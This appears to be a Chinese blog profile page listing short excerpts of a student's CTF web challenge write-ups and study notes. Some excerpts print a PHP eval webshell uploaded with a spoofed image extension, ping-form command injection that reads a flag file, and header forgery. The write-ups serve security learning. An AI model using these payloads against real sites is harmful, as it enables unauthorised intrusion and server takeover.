自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(24)
  • 收藏
  • 关注

原创 CTFHub web 文件上传 文件头检查

卡了好久题,突然就过了。写这篇的目的纯粹是心血来潮。(才不是为了水博客!)之前也搜了一些题解,但都没有详细说明我遇到的的问题,所以就自己写一下。简洁来说,就是在把 php 加入 png 时原图片过于复杂导致 php 解析不了。我的原图片直接记事本打开,末尾加入一句话木马<?php @eval($_POST['123']);?>这时候直接抓包改后缀,蚁剑测试连接不上。这个时候就只需要在 burp suite 中把那些没用的乱码删掉,(没错,就只要全删掉,这个东西卡了我

2022-05-15 21:38:27 453 5

原创 攻防世界 Web Training-WWW-Robots

这道题还是比较简单的。用 burp suite 爬一下就能得到 Robots.txt 的路径就在 robots.txt

2022-05-13 14:12:41 326

原创 攻防世界 web ics-06

题目提示报表被删掉了只有一处留下了痕迹。本来第一时间想到检查服务器日志,但好像并不行。打开题目,界面比较华丽但只有报表中心能点。进入报表中心,无论输入任何日期都没有反应。发现网址栏有 get 提交的 id=1,手撸几个数字没有反应,那就先尝试一下爆破。先来50000个数尝试一下,只有在2333时长度不同。输入网址得到flag。cyberpeace{6bc6badbdc5d04df2e423fb1b355e426}...

2022-05-12 19:41:11 115

原创 攻防世界 Web baby_web

题目提示 想想初始界面是哪一个。打开题目只有一行hello world。这个的确是学每一门编程语言最初的程序。但不是这道题所要的。将地址栏 1.php 改为 index.php 。网页没什么变化,但是打开开发者工具检查响应,就能发现的确存在 index.php 存在,flag就在响应头中。flag{very_baby_web}...

2022-05-12 19:29:17 343

原创 攻防世界 web command_execution

打开题目,发现一个 ping 的表单。ping作为系统命令,在使用的是可以通过注入其他命令的方式以达到操控系统的目的。猜测 flag 会被存放到一个名为 flag.txt 的文件中直接在表单中提交127.0.0.1 && find / -name flag.txt网页成功返回了 ping 的结果以外,也一同返回了查询命令的结果然后再输入127.0.0.1 && cat /home/flag.txt网页打印出flag.txt内容cy

2022-05-11 18:08:53 88

原创 攻防世界 Web xff_referer

题目描述中说道 xff 和 referer 是可以伪造的。而这道题中我们就来伪造这二者。X-Forward-For(xff)是客户端连接到网页的ip,referer是客户从哪个网页来访问的当前页面。打开 burp suite ,对网页抓包,发送给重发器(repeater)。要求 ip 为123.123.123.123,就在请求中添加X-Forwarded-For: 123.123.123.123发送。审查响应,发现要求客户从https://www.google.com发起请求。

2022-05-10 14:03:37 1360 1

原创 攻防世界 web upload1

之前在玩 dvwa ,正愁一身技艺无用武之地,突然发现攻防世界上这道题。打开题目,要求上传文件,很显然的文件上传漏洞。提交一句话病毒的php文件<?php @eval($_POST['123']);?>将密码改为 123.。但中途被拦下,提示要求上传图片格式文件。打开源代码一看,要求文件后缀为 .jpg 或 .pgn 。行,你要啥我给你啥。反手将文件后缀改成 .jpg 。然后默默打开 burp suite。改了但没完全改。在传包动点手脚再改回来。

2022-05-09 21:27:00 328

原创 攻防世界 web weak_auth

打开题目,发现一个拥有账号密码的登录验证界面。没有任何提示,那我们就只能先对它进行爆破。使用burpsuite对其进行抓包

2022-05-09 19:50:19 293

原创 SQL语句手记(个人向)

2022-05-09 19:18:29 120

原创 数据库语言手记

2022-05-08 14:26:44 284

原创 攻防世界 web simple_php

打开题目,是一段php代码。进行代码审计,发现,该程序以get方式接收a,b两个变量。而flag由两部分组成,分别受制于a,b。对于a,当$a==0并且$a时会输出flag。对于b,当is_numeric($b) 不成立且b>1234使输出。虽然看似不太可能,但php中用==进行判断(又叫弱类型比较)时会自动进行类型转换,而产生很多问题。对于纯字母的字符串与数字比较时,会将字母视为0,而在字母前存在数字时,其...

2022-05-05 09:58:08 602

原创 攻防世界 web disabled_button

按 F12 打开开发者工具,审查网页源代码。发现其中要提交的表单内唯一的一项上有一个disabled属性,它限制了该项目不可用,且不能被点击,直接把它删掉,点击按钮获得flag。cyberpeace{208fc4c9db603b36e1065b99f83b0383}...

2022-05-04 19:39:59 212

原创 攻防世界 web cookie

摘自百度百科总之,cookie作为令牌包含了一定的个人信息,每次登录一些网址会产生新的cookie。它用于验证身份,当然就存在于对网页的请求中。可以直接按 F12 打开网络(network)打开后刷新一下网页才会有内容。可以在左下角的请求头中找到cookie,它提示查看cookie.php在网址栏打开cookie.php,网页提示查看响应,同样按 F12 打开网络,即可得到flagcyberpeace{f5023599d1ec12e40e21c3cb10f239d0}.

2022-05-03 21:47:48 851

原创 攻防世界 web backup

打开题目,网页提示 你知道的index.php的备份文件名吗?常用的备份文件的后缀有“.git” 、“.svn”、“ .swp”、“.~”、“.bak”、“.bash_history”、“.bkf” 等。经逐一尝试在输入index.php.bak后下载了该文件。打开即可获得flag。Cyberpeace{855A1C4B3401294CB6604CCC98BDE334}...

2022-05-03 21:32:26 511

原创 攻防世界 web robots

Robots协议是网页所有者规定了该网站上那些内容可以被抓取,那些不可以抓取的一份公告。全称是“网络爬虫排除标准”。该协议防君子不防小人,并没有防止他人恶意抓取的能力。对于这道题我们直接在地址栏原地址后输入robots.txt即可查看 robots协议。在disallow(不允许)一栏我们发现该网站存在一个名为 f1ag_1s_h3re.php 的文件。将地址栏改为该文件即可得到flag。cyberpeace{2bbc96dfbadada45a45dcf796c1e57fd}.

2022-05-03 21:21:36 750

原创 攻防世界 web get_post

说道html的两种请求方式就指的是 get 和 post 了。二者最大的不同之处就是 get 是明文的,而 post 是不展现给用户的,但我们依旧可以利用工具查看。这里建议使用火狐(Firefox)浏览器中的Max HackBra插件。就是这个安装后按 F12 即可使用。打开题目,提示使用get传递a=1我们点击Max HackBra左侧load URL将当前地址加载进操作框内。在地址后加上?a=1改完的样子点击Execution发送(这里其实就相当于在网页地址栏直接修改)

2022-05-03 20:56:01 503

原创 攻防世界 Web view_source

这道题作为第一道题难度还是很简单的。1.在浏览器中按 F12 即可打开开发者工具。2.在第一栏中第一项 元素(Elements)即浏览器的源代码。鼠标放在其中时,网页就会指出该行代码所对应的位置。图为edge浏览器效果cyberpeace{5b93fac2236661a4ffa7bd640b483366}...

2022-05-03 20:25:08 292

原创 php 基础手记

2022-05-02 14:20:15 75

原创 Python requests库手记

2022-04-28 21:50:49 745

原创 python bs4库手记(个人向)

2022-04-28 19:44:57 915

原创 HTML基础手记(个人向)

2022-04-27 19:22:16 187

原创 Linux基础网络配置手记(个人向)

2022-04-27 17:35:05 39

原创 linux 常用入门手记(个人向)

2022-04-25 17:27:20 56

原创 Windows dos命令自学手记(个人向)

2022-04-23 20:00:47 166

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除